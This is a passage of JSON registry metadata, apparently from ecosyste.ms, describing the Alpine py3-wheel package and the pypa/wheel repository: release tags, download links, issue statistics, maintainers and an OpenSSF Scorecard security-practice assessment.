ies/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:43.754Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":19.522199035763112,"stargazers_count":8.15283874217457,"forks_count":6.807224580844787,"average":8.620565589695618},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.13","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages/py3-wheel/codemeta","maintainers":[{"uuid":"antoine.fontaine@epfl.ch","login":null,"name":"Antoine Fontaine","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","packages_count":17,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","role":null,"created_at":"2023-02-04T09:49:11.718Z","updated_at":"2023-02-04T09:49:11.718Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/maintainers/antoine.fontaine@epfl.ch/packages"}],"registry":{"name":"alpine-v3.13","url":"https://pkgs.alpinelinux.org/packages?branch=v3.13","ecosystem":"alpine","default":false,"packages_count":13897,"maintainers_count":231,"namespaces_count":2,"keywords_count":1898,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":592},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.734Z","updated_at":"2026-06-10T05:11:58.586Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.13/namespaces"}},{"id":6215589,"name":"py3-wheel","ecosystem":"alpine","description":"A built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2020-04-12T09:28:46.000Z","latest_release_published_at":"2020-04-12T09:28:46.000Z","latest_release_number":"0.34.2-r1","last_synced_at":"2026-04-02T15:20:39.063Z","created_at":"2023-02-01T03:17:07.132Z","updated_at":"2026-04-02T15:20:39.064Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.12/main/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of 